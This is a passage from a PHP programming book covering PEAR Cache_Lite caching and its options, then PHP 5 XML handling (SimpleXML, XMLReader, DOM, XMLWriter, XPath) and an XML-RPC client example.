$cache->end(); }
  • 409. Caching 385 $cache->setLifeTime(604800); if (!$cache->start('footer', 'Static')) { ?> <p>The footer time is now: <?php echo date('H:i:s'); ?></p> </body> </html> <?php $cache->end(); } ?> On viewing the page, Cache_Lite creates cache files in the cache directory. Because we’ve set the fileNameProtection option to false, Cache_Lite creates the files with these names: ■ ./cache/cache_Static_header ■ ./cache/cache_Dynamic_body ■ ./cache/cache_Static_footer You can read about the fileNameProtection option—and many more—in “What configuration options does Cache_Lite support?”. When the same page is requested later, the code above will use the cached file if it is valid and has not expired. Protect your Cache Files Make sure that the directory in which you place the cache files is not publicly available, or you may be offering your site’s visitors access to more than you realize. What configuration options does Cache_Lite support? When instantiating Cache_Lite (or any of its subclasses, such as Cache_Lite_Output), you can use any of a number of approaches to controlling its behavior. These options should be placed in an array and passed to the constructor as shown below (and in the previous section):
  • 410. 386 The PHP Anthology $options = array( 'cacheDir' => './cache/', 'writeControl' => true, 'readControl' => true, 'fileNameProtection' => false, 'readControlType' => 'md5' ); $cache = new Cache_Lite_Output($options); Solution The options available in the current version of Cache_Lite (1.7.2) are: cacheDir This is the directory in which the cache files will be placed. It defaults to /tmp/. caching This option switches on and off the caching behavior of Cache_Lite. If you have numerous Cache_Lite calls in your code and want to disable the cache for de­ bugging, for example, this option will be important. The default value is true (caching enabled). lifeTime This option represents the default lifetime (in seconds) of cache files. It can be changed using the setLifeTime method. The default value is 3600 (one hour), and if it’s set to null, the cache files will never expire. fileNameProtection With this option activated, Cache_Lite uses an MD5 encryption hash to generate the filename for the cache file. This option protects you from error when you try to use IDs or group names containing characters that aren’t valid for file­ names; fileNameProtection must be turned on when you use Cache_Lite_Function. The default is true (enabled). fileLocking This option is used to switch the file locking mechanisms on and off. The default is true (enabled).
  • 411. Caching 387 writeControl This option checks that a cache file has been written correctly immediately after it has been created, and throws a PEAR::Error if it finds a problem. Obviously, this facility would allow your code to attempt to rewrite a cache file that was created incorrectly, but it comes at a cost in terms of performance. The default value is true (enabled). readControl This option checks any cache files that are being read to ensure they’re not corrupt. Cache_Lite is able to place inside the file a value, such as the string length of the file, which can be used to confirm that the cache file isn’t corrupt. There are three alternative mechanisms for checking that a file is valid, and they’re specified using the readControlType option. These mechanisms come at the cost of performance, but should help to guarantee that your visitors aren’t seeing scrambled pages. The default value is true (enabled). readControlType This option lets you specify the type of read control mechanism you want to use. The available mechanisms are a cyclic redundancy check (crc32, the default value) using PHP’s crc32 function, an MD5 hash using PHP’s md5 function (md5), or a simple and fast string length check (strlen). Note that this mechanism is not intended to provide security from people tampering with your cache files; it’s just a way to spot corrupt files. pearErrorMode This option tells Cache_Lite how it should return PEAR errors to the calling script. The default is CACHE_LITE_ERROR_RETURN, which means Cache_Lite will return a PEAR::Error object. memoryCaching With memory caching enabled, every time a file is written to the cache, it is stored in an array in Cache_Lite. The saveMemoryCachingState and getMemoryCachingState methods can be used to store and access the memory cache data between requests. The advantage of this facility is that the complete set of cache files can be stored in a single file, reducing the number of disk read/write operations by reconstructing the cache files straight into an array to which your code has access. The memoryCaching option may be worth further investigation if you run a large site. The default value is false (disabled).
  • 412. 388 The PHP Anthology onlyMemoryCaching If this option is enabled, only the memory caching mechanism will be used. The default value is false (disabled). memoryCachingLimit This option places a limit on the number of cache files that will be stored in the memory caching array. The more cache files you have, the more memory will be used up by memory caching, so it may be a good idea to enforce a limit that prevents your server from having to work too hard. Of course, this option places no restriction on the size of each cache file, so just one or two massive files may cause a problem. The default value is 1000. automaticSerialization If enabled, this option will automatically serialize all data types. While this approach will slow down the caching system, it is useful for caching nonscalar data types such as objects and arrays. For higher performance, you might con­ sider serializing nonscalar data types yourself. The default value is false (dis­ abled). automaticCleaningFactor This option will automatically clean old cache entries—on average, one in x cache writes, where x is the value set for this option. Therefore, setting this value to 0 will indicate no automatic cleaning, and a value of 1 will cause cache clearing on every cache write. A value of 20 to 200 is the recommended starting point if you wish to enable this facility; it causes cache cleaning to happen, on average, 0.5% to 5% of the time. The default value is 0 (disabled). hashedDirectoryLevel When set to a nonzero value, this option will enable a hashed directory structure. A hashed directory structure will improve the performance of sites that have thousands of cache files. If you choose to use hashed directories, start by setting this value to 1, and increasing it as you test for performance improvements. The default value is 0 (disabled). errorHandlingAPIBreak This option was added to enable backwards compatibility with code that uses the old API. When the old API was run in CACHE_LITE_ERROR_RETURN mode (see the pearErrorMode option earlier in this list), some functions would return
  • 413. Caching 389 a Boolean value to indicate success, rather than returning a PEAR_Error object. By setting this value to true, the PEAR_Error object will be returned instead. The default value is false (disable). How do I purge the Cache_Lite cache? The built-in lifetime mechanism for Cache_Lite cache files provides a good foundation for keeping your cache files up to date, but there will be some circum­ stances in which you need the files to be updated immediately. Solution In cases in which you need immediate updates, the methods remove and clean come in handy. The remove method is designed to delete a specific cache file; it takes as arguments the cache ID and group name of the file. To delete the page body cache file we created in “How do I use PEAR::Cache_Lite for server-side caching?”, we’d use this code: $cache->remove('body', 'Dynamic'); If we use the clean method, we can delete all the files in our cache directory simply by calling the method with no arguments; alternatively, we can specify a group of cache files to delete. If we wanted to delete both the header and footer cache files we created in “How do I use PEAR::Cache_Lite for server-side caching?”, we could do so like this: $cache->clean('Static'); Discussion The remove and clean methods should obviously be called in response to events that arise within an application. For example, if you have a discussion forum ap­ plication, you probably want to remove the relevant cache files when a visitor posts a new message. Although it may seem like this solution entails a lot of code modifications, with some care it can be applied to your application in a global manner. If you have a central script that’s included in every page, your script can simply watch for incom­ ing events—for example, a variable like $_GET['newPost']—and respond by deleting
  • 414. 390 The PHP Anthology the required cache files. This keeps the cache file removal mechanism central and easier to maintain. You might also consider using the php.ini setting auto_pre­ pend_file to include this code in every PHP script. How do I cache function calls? Many web sites provide access to their data via web services such as SOAP and XML-RPC.9 As web services are accessed over a network, it’s often a very good idea to cache results so that they can be fetched locally, rather than repeating the same slow request to the server multiple times. A simple approach might be to use PHP sessions, but as that solution operates on a per-visitor basis, the opening requests for each visitor will still be slow. Solution Let’s assume you wish to create a web page that lists all the SitePoint books available on Amazon. The actual list is not likely to change from moment to moment, so why would we make the request to the Amazon web service every time the web page is displayed? We won’t! Instead, we can take advantage of Cache_Lite by caching the results of the XML-RPC request. Requires PEAR::SOAP Version 0.11.0 The following solution uses the PEAR::SOAP library version 0.11.0 to access the Amazon web service. You can find this package on the PEAR web site.10 Here’s some hypothetical code that fetches the data from the remote Amazon server: $results = $amazonClient->ManufacturerSearchRequest($params); Using Cache_Lite_Function, we can cache the results so the data returned from the service can be reused; this will avoid unnecessary network calls and significantly improve performance. The following example code focuses on the caching aspect to prevent us from getting bogged down in the details of using the Amazon web service. You can see the 9 You can read all about web services in Chapter 12. 10 http://pear.php.net/package/soap/
  • 415. Caching 391 complete script if you download this book’s code archive from the SitePoint web site. The Cache_Lite_Function requires the inclusion of the following file: cachefunction.php (excerpt) require_once 'Cache/Lite/Function.php'; We instantiate the Cache_Lite_Function class with some options: cachefunction.php (excerpt) $options = array( 'cacheDir' => './cache/', 'fileNameProtection' => true, 'writeControl' => true, 'readControl' => true, 'readControlType' => 'strlen', 'defaultGroup' => 'SOAP' ); $cache = new Cache_Lite_Function($options); It’s important that the fileNameProtection option is set to true (this is in fact the default value, but in this case I’ve set it manually to emphasize the point). If it were set to false, the filename would be invalid, so the data will not be cached. Here’s how we make the calls to our SOAP client class: cachefunction.php (excerpt) $results = $cache->call('amazonClient->ManufacturerSearchRequest', $params); If the request is being made for the first time, Cache_Lite_Function will store the results as a serialized array or object in a cache file (not that you need to worry about this), and this file will be used for future requests until it expires. The setLifeTime method can again be used to specify how long the cache files should survive before they’re refreshed; currently, the default value of 3600 seconds (one hour) is being used. You can then use the $results variable exactly as if you were
  • 416. 392 The PHP Anthology calling the web service method directly. The output of our example script can be seen in Figure 11.1. Figure 11.1. SitePoint books at Amazon Summary Caching is an important and often overlooked aspect of web site development. Many factors that affect the performance of today’s web sites weren’t a problem for their predecessors—from complex, dynamic page generation, to a reliance on third-party data over the network. In this chapter, we’ve examined HTML meta tags, HTTP headers, PHP output buffering and PEAR::Cache_Lite, and we’ve seen how you can use them to control the caching of your web site content and improve the site’s reliability and performance.
  • 417. Caching 393 Implementing a caching system for your site might be simple, but ultimately, it depends on your requirements. If you have a busy and predominantly static web site—such as a blog—that’s managed through a content management system, it will likely require little alteration, yet may benefit from huge performance improvements resulting from a small investment of your time. Setting up caching for a more com­ plex site that generates content on a per-user basis, such as a portal or shopping cart system, will prove a little more tricky and time consuming, but the benefits are still clear. Regardless, I hope the information in this chapter has given you a good grasp of the options available, and will help you determine which techniques are most suitable for your application.
  • 419. 12 Chapter XML and Web Services Probably the single biggest addition to PHP 5 following the changes in the object oriented programming model was the rewriting of the DOM XML extension, the addition of the SimpleXML extension, and the addition of the SOAP extension. PHP 5.1 introduced two new XML extensions, XMLReader and XMLWriter. XML and web services are broad topics when viewed within the realm of PHP, due to the number of facilities that are available for producing and consuming XML. Entire books have been devoted to them.1 In this chapter, we’ll explore useful solutions for handling some of the more common XML-related tasks, as well as for consuming and serving XML-based web services; the rest is up to you! Using the Zend Framework A number of examples in this chapter utilize components from the Zend Frame­ work.2 Installation of the framework is simple: download the appropriate format 1 Two good sources include Rob Richards’s Pro PHP XML and Web Services (Berkeley: Apress, 2006), and Thomas Myer’s No Nonsense XML Web Development With PHP (Melbourne: SitePoint, 2005). 2 http://framework.zend.com/
  • 420. 396 The PHP Anthology from http://framework.zend.com/download/, extract the archive, and update your include_path to point to the library directory of the installation. Which XML technologies are available in PHP 5? PHP 5 offers a number of new XML extensions. You can read about what’s new in the Zend Developer Network article, “XML in PHP 5: What’s New?”3 Solution Table 12.1 summarizes the XML extensions available in PHP 5. Why should I use PHP’s XML extensions instead of PHP string functions? If XML is primarily a text format, why would we bother using the XML extensions? Why wouldn’t we simply concatenate strings to create documents, or use regular expressions to parse them? Solution The answer to this question is: for reasons of performance, compatibility, flexibility, and ease of use. Certainly, XML documents can be parsed using a series or regular expressions. However, the PCRE engine is fairly heavyweight, and isn’t optimized for such tasks. Tools such as SimpleXML and XMLReader allow you to iterate through a document with ease, grabbing only the content you need without ever once writing a regular expression. Using SAX, you can trigger code to execute as particular elements are found in the document. XSL can be used to transform XML documents into other XML documents, XHTML, SQL, and more. 3 http://devzone.zend.com/node/view/id/1713/
  • 421. XML and Web Services 397 Table 12.1. XML Extensions in PHP Extension Purpose More Information SAX This set of PHP functions was designed for creating http://www.php.net/xml/ XML parsers and XML event handlers. It has been available since PHP 4 and is enabled by default. DOM This OOP extension allows you to operate on or create http://www.php.net/dom/ an XML document using the Document Object Model, or DOM. It has been available since PHP 5.0.0 and is enabled by default. XPath Built into the DOM extension, XPath allows you to perform queries on your XML documents. It’s been available as part of the DOM extension since PHP 5.0.0. XSL An OOP extension for performing Extensible http://www.php.net/xsl/ Stylesheet Language Transformations (XSLT) on DOM documents, XSL has been available since PHP 5.0.0. It can be enabled by sending the --with-xsl argument to the compiler. SimpleXML An OOP tool set used to convert XML to iterable http://www.php.net/simplexml/ objects, and thus allow the processing of XML using normal property selectors and array access. Available since PHP 5.0.0, SimpleXML is enabled by default; some features vary between PHP versions. XMLReader An OOP extension for iterating through an XML http://www.php.net/xmlreader/ stream a node at a time, XMLReader has been available in PECL since PHP 5.0.0, and enabled by default since PHP 5.1.0. XMLWriter This hybrid extension uses either function or OOP http://www.php.net/xmlwriter/ access to create XML documents. Available in PECL since PHP 5.1.0, it has been enabled by default since PHP 5.1.4. Enable it by sending the --with-xmlwriter argument to the compiler in previous versions.
  • 422. 398 The PHP Anthology Extension Purpose More Information XML-RPC A set of functions that allow developers to encode http://www.php.net/xmlrpc/ and decode XML-RPC values and create XML-RPC servers that use PHP functions and callbacks to handle requests, XML-RPC has been available since PHP 4.1.0. Enable it by sending the --with-xmlrpc argument to the compiler. SOAP The SOAP extension allows developers to create SOAP http://www.php.net/soap/ clients or servers easily, and to bind objects or functions to the client or server. Available since PHP 5.0.0, it can be enabled by sending the --with-soap argument to the compiler. Discussion XML documents may easily be written as the standard output of an application, or by concatenating strings. However, you then need to worry about character encoding issues, character typos that may affect document validity, and more. You can avoid these issues using tools such as the DOM or XMLWriter extensions. How do I parse an RSS feed? RSS is becoming a ubiquitous Web technology—most sites offer RSS feeds of their updated content, and many use this as a means to communicate with users. How can you incorporate RSS feeds from other sites on your own? Solutions SimpleXML makes parsing XML as easy as traversing an object: instead of needing to check for the element’s position, name, and type, we simply access the element. To do so, though, we need to know something about the structure of the XML we’re parsing; RSS, since it’s a published standard, is easy to parse using SimpleXML. One thing to remember with SimpleXML is that if you want the actual value of a property you’re accessing, you must cast it to the appropriate type first; otherwise, you’ll receive the SimpleXMLElement representing the value. In the following ex­ ample, we use the simplexml_load_file function to load the RSS from the sitepoint.com blogs feed and output the content of some of the elements:
  • 423. XML and Web Services 399 simplexml.php (excerpt) $url = 'http://rss.sitepoint.com/f/sitepoint_blogs_feed'; $xml = simplexml_load_file($url); $channel = $xml->channel; echo "Title: ", (string) $channel->title, "n", "Description: ", (string) $channel->description, "n", "Link: ", (string) $channel->link, "n"; foreach ($channel->item as $item) { echo "Item: ", (string) $item->title, "n", "Link: ", (string) $item->link, "n", "Description:n", (string) $item->description, "n"; } The SimpleXML solution provided above is just one of several approaches you may use with PHP 5. Let’s take a quick look at some other possibilities that exemplify the elegance of SimpleXML. Parsing XML with XMLReader XMLReader is a newcomer on the PHP scene, having only become available since PHP 5.1.0. It allows iterative access to XML documents using object oriented nota­ tion. However, it is more in the class of SAX than DOM or SimpleXML, as it provides a more programmatic way to process the document. In this example, we'll build a class—Rss_XmlReader—to encapsulate the functions we need to parse an RSS feed using XMLReader. First, we define some class properties and the constructor method: Rss_XmlReader.class.php (excerpt) class Rss_XmlReader { public $channelTitle = ''; public $channelDesc = ''; public $channelLink = ''; public $items = array(); public $xml; public function __construct($url = null) { if (null !== $url)
  • 424. 400 The PHP Anthology { $this->load($url); } } The first three of these properties hold the RSS channel information, the $items array will hold all the RSS items from the specified feed, and $xml will hold the feed’s raw XML source. The constructor takes one argument: the URL of the RSS feed. If a URL is provided to the constructor, we’ll load and parse it immediately. Here’s what the load method looks like: Rss_XmlReader.class.php (excerpt) public function load($url) { $this->xml = file_get_contents($url); $xr = new XMLReader(); $xr->XML($this->xml); $this->channelTitle = ''; $this->channelDesc = ''; $this->channelLink = ''; $this->items = array(); while ($xr->read()) { if (XMLReader::ELEMENT == $xr->nodeType) { switch ($xr->localName) { case 'channel': $this->_getChannelInfo($xr); break; case 'item': $this->_getItem($xr); break; } } } }
  • 425. XML and Web Services 401 Using file_get_contents, we retrieve the raw XML source, instantiate a new XMLReader, and begin to read the RSS feed. As I mentioned previously, XMLReader requires us to iterate through every node of the document—including the text ele­ ments of an XML node. During the load routine, we go through the top-level element nodes of the document, and, if the current node is a channel, we read the channel information. If it’s an item element, we read the details of the item. The _getChannelInfo method reads the channel information from the channel element: Rss_XmlReader.class.php (excerpt) protected function _getChannelInfo($xr) { while ($xr->read() && ($xr->depth == 2)) { if (XMLReader::ELEMENT == $xr->nodeType) { switch ($xr->localName) { case 'title': $xr->read(); $this->channelTitle = $xr->value; break; case 'description': $xr->read(); $this->channelDesc = $xr->value; break; case 'link': $xr->read(); $this->channelLink = $xr->value; break; } } } } Parsing the channel information requires that we pluck the appropriate nodes out of the channel element, including the channel title, description, and link, and store them in the appropriate object properties.
  • 426. 402 The PHP Anthology Parsing an item is really no different from parsing the channel information—we grab one item element at a time. The only difference is that the information is stored in the $items array for later iteration: Rss_XmlReader.class.php (excerpt) protected function _getItem($xr) { $title = ''; $link = ''; $desc = ''; $date = ''; while ($xr->read() && ($xr->depth > 2)) { if (XMLReader::ELEMENT == $xr->nodeType) { switch ($xr->localName) { case 'title': $xr->read(); $title = $xr->value; break; case 'description': $xr->read(); $desc = $xr->value; break; case 'link': $xr->read(); $link = $xr->value; break; case 'date': $xr->read(); $date = $xr->value; break; } } } $this->items[] = array( 'title' => $title, 'link' => $link, 'desc' => $desc, 'date' => $date ); } }
  • 427. XML and Web Services 403 Here is an example of our class in use: xmlreader.php (excerpt) <?php require_once 'Rss_XmlReader.class.php'; $rss = new Rss_XmlReader( 'http://rss.sitepoint.com/f/sitepoint_blogs_feed'); echo "Title: ", $rss->channelTitle, "n", "Description: ", $rss->channelDesc, "n", "Link: ", $rss->channelLink, "n"; foreach ($rss->items as $item) { echo "Item: {$item['title']}nLink: " . "{$item['link']}nDescription:n{$item['desc']}n"; } ?> Now that all this work is done, we finally have the equivalent of the simple solution we presented earlier with SimpleXML. Unfortunately, we’ve also done a lot more work. SimpleXML with Zend_Feed RSS feeds are not the only feeds available, and you might want to access multiple feed types in a similar fashion. Zend_Feed, a component of the Zend Framework, offers a unified interface to both RSS and Atom feeds.4 It’s basically a class that uses SimpleXML, but simplifies the process of retrieving the values by eliminating the need to cast them to the appropriate type. Here’s an example: zendfeed.php (excerpt) require_once 'Zend/Feed/Rss.php'; $url = 'http://rss.sitepoint.com/f/sitepoint_blogs_feed'; $channel = new Zend_Feed_Rss($url); // Use function syntax to grab properties as values echo "Title: ", $channel->title(), "n", "Description: ", $channel->description(), "n", "Link: ", $channel->link(), "n"; 4 For Zend_Feed documentation, see http://framework.zend.com/manual/en/zend.feed.html.
  • 428. 404 The PHP Anthology foreach ($channel as $item) { echo "Item: ", $item->title(), "n", "Link: ", $item->link(), "n", "Description:n", $item->description(), "n"; } Discussion As you can see, using SimpleXML or Zend_Feed is much simpler than creating your own parser, as we did when we used XMLReader. The approach that uses Zend_Feed doesn’t differ much from that which used SimpleXML; it simply eliminates the need to perform type casting. So, why would we bother with XMLReader? In the days of PHP 4, the parsing of XML in formats such as RSS feeds was almost always done in SAX, if it wasn’t done using simple regular expressions. The DOM XML extension was a latecomer on the PHP 4 scene and wasn’t included in the core distribution, and thus did not gain much popularity amongst PHP 4 users. In addi­ tion, most PHP 4 books demonstrated XML parsing using SAX, which led many developers to use SAX whenever XML parsing was required. Things have changed, however, and we now have a plethora of options for parsing XML in PHP 5. SAX is still a good option if you’re parsing large documents, as it parses element by element, allowing PHP to keep a low memory footprint. However, since it does parse element by element, and requires the developer to define callbacks practically at a per-element level, it’s rather unintuitive to use, and developers tend to end up mired in the details of keeping track of element names and references. If you thought the XMLReader example above was difficult to follow, a SAX example would have had you completely lost. XMLReader combines the low-memory footprint benefits of SAX with some of the simplicity of SimpleXML. Like SAX, XMLReader uses a pull technology, which means it parses the document incrementally as it reads it. Unlike SAX, however, you don’t have to specify handlers for elements; it’s actually relatively simple to parse through a document in a single loop. The main benefit of using XMLReader is performance; since XMLReader operates on a stream instead of pulling the entire
  • 429. XML and Web Services 405 XML document into memory, it can achieve a lot of processing with a small memory footprint. DOM functions can also be used to navigate XML.5 This option has one feature that makes it an excellent choice for many: XPath integration. XPath allows you to search for nodes within the document by path—an excellent technique for those times when you want to pull data selectively from an XML document. However, the DOM functions make it relatively difficult to loop over elements with the ease that Sim­ pleXML presents; they’re simply overkill for a situation as simple as parsing an RSS feed. Use DOM when you need to do more complex tasks, such as modifying XML documents in place. The best answer to the question of how to parse XML is to use SimpleXML, or a library wrapping it, such as Zend_Feed. The simplicity of treating an XML document like a native PHP object cannot be overstated. In addition, because it builds on the DOM extension, it has built-in XPath support, and at any point you can convert a 6 SimpleXMLElement to a DOMElement using the dom_import_simplexml function. How do I generate an RSS feed? While it’s great to know how to parse RSS feeds, at some point, you’ll undoubtedly want to generate your own. What XML technologies can you use with PHP 5 to generate an RSS feed? Solutions All these solutions use the following data definition with which to generate the RSS feed (you can find the complete file in the code archive): rsssource.php.inc (excerpt) $baseUrl = 'http://example.com/extensions/xml/'; $extensions = array( 1 => array( 'title' => 'SAX', 'description' => 'ext/xml provides a SAX XML parser generator', 'link' => $baseUrl . 'sax' 5 http://www.php.net/dom/ 6 http://www.php.net/dom_import_simplexml/
  • 430. 406 The PHP Anthology ), 2 => array( 'title' => 'DOM', 'description' => 'The DOM extension provides an implementation ➥ of DOM, the Document Object Model', 'link' => $baseUrl . 'dom' ), 3 => array( 'title' => 'XPath', 'description' => 'XPath is used to query XML documents for ➥ elements', 'link' => $baseUrl . 'xpath' ) ⋮ more array items follow… ); Because of its ability to map object properties to XML elements, SimpleXML makes it very easy to generate XML documents quickly: rss_simplexml.php (excerpt) require 'rsssource.php.inc'; $rss = new SimpleXMLElement( '<?xml version="1.0" encoding="UTF-8" ?>' . '<rss version="2.0"></rss>'); $rss->addChild('channel'); $rss->channel->addChild('title', 'PHP XML Extensions'); $rss->channel->addChild('description', 'Information and examples for using the PHP XML extensions'); $rss->channel->addChild('link', 'http://example.com/extensions/xml/'); foreach ($extensions as $extension) { $item = $rss->channel->addChild('item'); $item->addChild('title', $extension['title']); $item->addChild('description', $extension['description']); $item->addChild('link', $extension['link']); } echo $rss->asXML(); We previously used SimpleXML to parse XML; in PHP 5.1.3 and versions above, it can also be used to generate XML (instead of simply modifying existing XML). It
  • 431. XML and Web Services 407 doesn’t offer the full set of tools that the DOM makes available, but you can always convert your SimpleXMLElement to a DOMElement using dom_import_simplexml. As with the task of parsing XML, there’s more than one way to generate XML; other options include DOM and XMLWriter. Generating XML Using the DOM DOM, the Document Object Model, allows you to traverse XML in a tree-like structure, looking down the tree at child nodes, up the tree at parent nodes, and horizontally at sibling nodes. Since it supports the entire breadth of XML, the DOM is an excellent all-around choice for generating XML structures: rss_dom.php (excerpt) require 'rsssource.php.inc'; $document = new DOMDocument('1.0', 'UTF-8'); $rss = $document->createElement('rss'); $rss->setAttribute('version', '2.0'); $channel = $document->createElement('channel'); $title = $document->createElement('title', 'PHP XML Extensions'); $description = $document->createElement('description', 'Information and examples for using the PHP XML extensions'); $link = $document->createElement('link', 'http://example.com/extensions/xml/'); $channel->appendChild($title); $channel->appendChild($description); $channel->appendChild($link); foreach ($extensions as $extension) { $item = $document->createElement('item'); $title = $document->createElement('title', $extension['title']); $description = $document->createElement('description', $extension['description']); $link = $document->createElement('link', $extension['link']); $item->appendChild($title); $item->appendChild($description); $item->appendChild($link); $channel->appendChild($item); } $rss->appendChild($channel); $document->appendChild($rss); echo $document->saveXML();
  • 432. 408 The PHP Anthology Generating XML Using XMLWriter XMLWriter is a cousin to XMLReader. It allows you to iteratively write XML docu­ ments, element by element, and to write either in-memory or directly to a URL.7 The XMLWriter interface can be accessed using either OOP or procedural function calls: rss_xmlwriter.php (excerpt) require 'rsssource.php.inc'; $xw = new xmlWriter(); $xw->openMemory(); // use openUri() to output directly to a file $xw->startDocument('1.0', 'UTF-8'); $xw->startElement('rss'); $xw->startElement('channel'); $xw->writeElement('title', 'PHP XML Extensions'); $xw->writeElement('description', 'Information and examples for using the PHP XML extensions'); $xw->writeElement('link', 'http://example.com/extensions/xml/'); foreach ($extensions as $extension) { $xw->startElement('item'); $xw->writeElement('title', $extension['title']); $xw->writeElement('description', $extension['description']); $xw->writeElement('link', $extension['link']); $xw->endElement(); // item } $xw->endElement(); // channel $xw->endElement(); // rss $xml = $xw->outputMemory(true); echo $xml; Discussion While probably the easiest solutions for generating XML are simply to concatenate strings or to use a templating system, both have a significant drawback: they make it very easy to mix character encodings accidentally or to introduce extraneous tags or reserved XML entities, and thus end up with invalid XML. The better solution 7 For an in-depth explanation of XMLWriter, check out php|architect’s May 2006 issue, which has an article entitled "XMLWriter," by Rob Richards, author of the extension.
  • 433. XML and Web Services 409 is to use one of DOM, SimpleXML, or XMLWriter extensions, which take care of those problems automatically. XMLWriter is a relatively new extension that can be very useful if you’re generating XML content sequentially. It’s a great choice if you have a fairly flat tree structure, as this approach is almost as easy as concatenating strings or using a template system, yet it protects you against encoding issues and improperly formed XML. XMLWriter is also a great choice if you’re creating large documents, as it has the ability to write documents directly to disk instead of keeping them in memory. This approach helps prevent the kinds of memory issues found in the more heavyweight extensions, such as DOM and SimpleXML, that operate entirely in memory. On the downside, you have to close your own elements and keep track of where you are in the tree in order to use this functionality. Your best bet is to use code indentation and comments to keep track of where you are in the tree. DOM allows you to build your documents from the inside out, and vice versa. However, you’ll quickly become bogged down trying to remember which node you’re in and whether or not it has children or a parent, because you need to operate on individual DOMElements. There’s no easy way to view the overall tree structure from your code. As a result, it’s probably best to use the DOM when you need to modify existing XML. As we’ve seen in these examples, SimpleXML allows you to build XML documents as well as read them. Its object mapping of XML makes it very easy to create visual trees in your code, and its ties to the DOM mean that once you’ve created the structure, you can easily manipulate the document using DOM to set the encoding and namespaces as necessary. The combination of SimpleXML and DOM should become the Swiss Army Knife of your XML toolbox in PHP 5. How do I search for a node or content in XML? Often, you only need a few pieces of information from a particular XML document. Should you parse the entire document to find those elements? What if, for example, all you need is a set of siblings that share a given element name?
  • 434. 410 The PHP Anthology Solution The solution is easy: use XPath. XPath, the XML Path Language, allows you to search the logical structure of a document using a URL-like path notation. It was originally developed to aid in XSL transformations, but has many other uses. The DOM extension has built-in support for XPath; so does SimpleXML. Here’s an ex­ ample that uses the DOM extension: xpath_dom.php (excerpt) $doc = new DOMDocument; $doc->preserveWhiteSpace = false; $doc->load('http://rss.sitepoint.com/f/sitepoint_blogs_feed'); $xpath = new DOMXPath($doc); $titles = $xpath->query('//item/title'); foreach ($titles as $title) { echo $title->nodeValue, "n"; } This example loads the SitePoint blog feed and uses the XPath query //item/title to select the title elements from all the item elements. Here's a similar solution using SimpleXML: xpath_simplexml.php (excerpt) $doc = new SimpleXMLElement( 'http://rss.sitepoint.com/f/sitepoint_blogs_feed', null, true // tell SimpleXML that we're supplying a URL ); // search for titles with an item parent foreach ($doc->xpath('//item/title') as $title) { echo $title, "n"; }
  • 435. XML and Web Services 411 Discussion XPath could easily be the subject of an entire chapter, or even a book. The following discussion serves only as the briefest of introductions; for full documentation on the subject, check out the XPath specification at the W3C.8 9 XPath operates under a number of rules, the most basic of which is that the forward slash, /, is used as a path separator between different levels in the XML tree hier­ archy. In the examples above, we were looking only for title nodes that were children of item elements: item/title. In order to tell XPath that this is a relative path, and that we don’t want to start the search from the root node, we prefix the path with double slashes, //. The same data could have been queried using a full path to the elements, /rss/channel/item/title. The most basic rules for using XPath are: ■ A forward slash, /, is a path separator. ■ An absolute path from the root starts with a single forward slash, /. ■ A relative path from a given location can start with anything else. ■ A relative path matching elements at any depth of the document starts with two forward slashes, //. ■ A double period, .., indicates the parent of a node. ■ A single period, ., indicates the current node. XPath also allows you to match against element attributes, specific items within a set of results, and even element values: ■ Match values using [NODE=””], where NODE is a node name or indicator (such as . or ..). ■ Match attributes using @ATTR, either as part of the path expression, or as a mod­ ifier to the node (for example item/@type, item[@type], item[@type='']). ■ Match a specific element in a returned list of nodes using brackets (for example, //item/title[2]); note that indices start at 1. 8 http://www.w3.org/TR/xpath/ 9 Sun also has an excellent XPath tutorial available at http://java.sun.com/j2ee/1.4/docs/tutorial/doc/JAXPXSLT3.html.
  • 436. 412 The PHP Anthology As an example, on the day I write this, the SitePoint Blogs RSS feed presents an item with the title, “News Wire: Liquid vs. Fixed.” To grab this item element, I can use the following code: // assuming $doc is a SimpleXMLElement $item = $doc->xpath( '//item/title[.="News Wire: Liquid vs. Fixed"]/..'); Those lines return to me the item node and its children by matching: ■ all item elements (//item) ■ that have a title element (/title) ■ with a value of “News Wire: Liquid vs. Fixed” ([.="News Wire: Liquid vs. Fixed"]) ■ and return the parent item element(/..) Several wildcards are also allowed: ■ * matches any element node (not a text or attribute node). ■ node() matches any type of node. ■ @* matches any attribute. XPath has much more to offer, including operators and a set of functions for matching and manipulating strings in the path. If you find yourself needing to search your XML documents, XPath is a good skillset to have at your disposal. How can I consume XML-RPC web services? XML-RPC is an XML-based protocol for performing remote procedure calls—basic­ ally, the process of calling functions and methods on a remote machine. The XML­ RPC specification defines a simple structure for calling a method on a server with one or more parameters of given types; a single value is returned—just like a PHP function.10 For more information on XML-RPC, visit the official XML-RPC web site.11 10 http://www.xmlrpc.com/spec/ 11 http://www.xmlrpc.com/
  • 437. XML and Web Services 413 XML-RPC also uses the concept of namespaces. Namespaces allow a single server to serve several groups of related methods in a way that ensures that method name collisions do not occur. A prototype XML-RPC method call might look like this: struct lookup.state(string) This call indicates that the state method of the lookup namespace expects a string as an argument, and returns a struct (associative array) as a response. An actual call, using Zend Framework’s Zend_XmlRpc_Client, might look like this: $info = $client->lookup->state('Vermont'); XML-RPC is the grand-daddy of web services, and its simplicity is appealing to many developers; with the clients available in most languages, we simply pass in native values, and receive a native value as a response. So, now you know about XML-RPC; how can you consume an XML-RPC service? Solution The Zend Framework offers an XML-RPC implementation that includes both a client and server. Its interface is entirely object oriented, making it a good choice for OOP enthusiasts; in particular, the ability to chain namespaces leading to a method makes it incredibly intuitive to use. As an example, here’s a simple XML-RPC client script that uses the XML-RPC server in “How do I serve my own XML-RPC web services?”. The server exposes a math namespace with two methods, add and multiply: zend_xmlrpc_client.php (excerpt) require_once 'Zend/XmlRpc/Client.php'; try { $client = new Zend_XmlRpc_Client( 'http://localhost/phpant2/chapter_12/examples/' . 'zend_xmlrpc_serv.php'); $proxy = $client->getProxy(); $add = $proxy->math->add(array(1,2)); $mult = $proxy->math->multiply(array(21343243346,989554365486)); echo '1 + 2 = ' . $add . "<br />"; echo 